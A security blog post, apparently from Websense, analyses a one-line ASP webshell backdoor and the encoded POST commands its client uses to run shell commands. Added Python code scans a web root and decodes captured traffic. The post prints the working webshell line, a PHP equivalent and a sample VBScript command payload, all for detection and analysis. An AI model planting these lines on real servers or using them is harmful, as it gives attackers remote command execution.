Analysis of a backdoor's communication process
Websense Security Labs™ ThreatSeeker™ Network has detected a backdoor written by a Chinese hacker spreading in the wild. In this post we explore what an attacker can do with such a backdoor and how its client and server sides talk to each other.
The backdoor's controller client can browse and modify files on the compromised server (anything the account the web server runs under can read or write):
The attacker can also use the client to run commands on the compromised server:
With the heavy lifting done on the client side, the server side needs only a line or two of ASP or PHP, so it is easy to plant in a web page through SQL injection or any other attack that lets the attacker write to the web root. The server side looks like this:
<%eval request("hack")%>
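Because the whole server side is one line, the most practical host-side check is a signature scan of the web root for exactly this kind of eval-of-request one-liner. The scanner below is an added example, not Websense's detection logic and not code from the backdoor's author: the ASP pattern is built from the line shown above, the PHP pattern covers the equivalent PHP one-liner, the set of executable extensions is an assumption, and the sample files it scans are constructed in a temporary directory for the demo.

```python
import os
import re
import tempfile

# Signatures for one-line ASP/PHP server sides. Added example, not the post's code.
WEBSHELL_SIGNATURES = {
    # matches <%eval request("hack")%> and variants such as <% Execute(Request("x")) %>
    "asp-eval-request": re.compile(
        r"<%\s*(?:eval|execute)\s*\(?\s*request\s*\(", re.IGNORECASE),
    # matches <?php @eval($_POST['hack']); ?> and the base64-wrapped form
    "php-eval-post": re.compile(
        r"\beval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|GET|REQUEST)\s*\[",
        re.IGNORECASE),
}

# Extensions the web server will execute as script; an assumption for this example.
SCRIPT_EXTENSIONS = {".asp", ".asa", ".aspx", ".php", ".phtml"}


def scan_text(content: str) -> list[str]:
    """Return the names of every signature that matches the given file content."""
    return [name for name, pattern in WEBSHELL_SIGNATURES.items() if pattern.search(content)]


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a web root and map each suspicious script file to the signatures it hit."""
    hits: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            if os.path.splitext(filename)[1].lower() not in SCRIPT_EXTENSIONS:
                continue  # a .txt mentioning the pattern is not executable, so skip it
            path = os.path.join(dirpath, filename)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                matched = scan_text(fh.read())
            if matched:
                hits[os.path.relpath(path, root)] = matched
    return hits


def demo() -> dict[str, list[str]]:
    """Build a constructed web root in a temp dir and scan it (sample files, not real ones)."""
    samples = {
        # one-liner appended to an otherwise normal page
        "default.asp": '<html><body>Welcome</body></html>\n<%eval request("hack")%>\n',
        # PHP equivalent dropped into an upload directory
        "img/upload.php": "<?php @eval($_POST['hack']); ?>",
        # benign script, must not be flagged
        "about.asp": '<% Response.Write("About us") %>',
        # non-executable file, skipped by extension
        "notes.txt": 'reminder: <%eval request("hack")%> is what we are hunting',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, content in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for path, sigs in demo().items():
        print(f"{path}: {', '.join(sigs)}")
```

Run it against a real web root with `scan_tree("C:/inetpub/wwwroot")` (path is an assumption) and treat any hit as a file to pull for review rather than something to delete on the spot; the attacker usually has a second copy elsewhere.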
By capturing the network traffic, we can see what the backdoor did. Here is an example:
The client generates an encoded command string and sends it to the server in a POST request. The string is:
After decoding it, we can see how a command is run on the compromised server:
The parameter z1 is "cmd", which opens a command shell on the server side, and the parameter z2, which holds the command line to run, is:
In response to this request, the server returns a listing of all files in the current folder:
The above shows a "dir" command being run on a compromised server. Using this method, an attacker can run almost any command on the server from the client side, limited only by the privileges of the account the web server runs under.
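To see what the exchange above looks like off the wire, here is an added example (not code from the post or from the backdoor's author) that decodes a captured POST body and flags it. The post does not reproduce the encoded string, so the layout is this example's assumption: the `hack` parameter carries the VBScript the one-liner will eval, and `z1`/`z2` carry the command runner and the command line, base64-encoded. The sample request is constructed; swap `_decode_arg` for whatever encoding a real capture shows.

```python
import base64
import re
from urllib.parse import parse_qs, urlencode

# Constructed sample capture (not the post's own string). The VBScript is what a
# client might send for an <%eval request("hack")%> server side: it runs a shell
# with z1 as the program and z2 as its arguments and writes the output back.
SAMPLE_SCRIPT = (
    'Set o=CreateObject("WScript.Shell"):'
    'Response.Write(o.Exec(Request("z1")&" /c "&Request("z2")).StdOut.ReadAll())'
)
SAMPLE_POST_BODY = urlencode({
    "hack": SAMPLE_SCRIPT,
    "z1": base64.b64encode(b"cmd").decode(),  # base64 is this example's assumption
    "z2": base64.b64encode(b"cd /d c:\\inetpub\\wwwroot & dir").decode(),
})

# Calls that turn request data into code or a process in ASP/PHP; any non-z
# parameter containing one of them is treated as script sent to a backdoor.
SCRIPT_EXEC = re.compile(
    r"(?:\bExecute\b|\bEval\b|CreateObject|WScript\.Shell|Response\.Write|"
    r"\bsystem\b|\bpassthru\b|shell_exec|base64_decode)",
    re.IGNORECASE,
)


def _decode_arg(value: str) -> str:
    """Decode a z-parameter; values that are not valid base64 are kept as-is."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return value


def parse_backdoor_request(body: str) -> dict:
    """Split a POST body into ordinary parameters and decoded z1/z2/... arguments."""
    parsed = {"params": {}, "args": {}}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if re.fullmatch(r"z\d+", name):
            parsed["args"][name] = _decode_arg(values[0])
        else:
            parsed["params"][name] = values[0]
    return parsed


def flag_backdoor_request(parsed: dict) -> list[str]:
    """Return human-readable reasons the request looks like backdoor traffic."""
    reasons = []
    for name, value in parsed["params"].items():
        if SCRIPT_EXEC.search(value):
            reasons.append(f"parameter {name!r} carries server-side script: {value[:48]}...")
    if parsed["args"].get("z1", "").lower() == "cmd":
        reasons.append("z1 is 'cmd': z2 will be handed to a command shell")
        if "z2" in parsed["args"]:
            reasons.append("command line in z2: " + parsed["args"]["z2"])
    return reasons


if __name__ == "__main__":
    request = parse_backdoor_request(SAMPLE_POST_BODY)
    print("decoded arguments:", request["args"])
    for reason in flag_backdoor_request(request):
        print("-", reason)
```

The check keys on the combination rather than on any one field: a parameter that contains script plus a `z1` of `cmd` is far stronger than either alone, and the decoded `z2` is what an incident responder wants to log, since it is the exact command the attacker ran.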
Websense Messaging and Websense Web Security customers are protected against these attacks.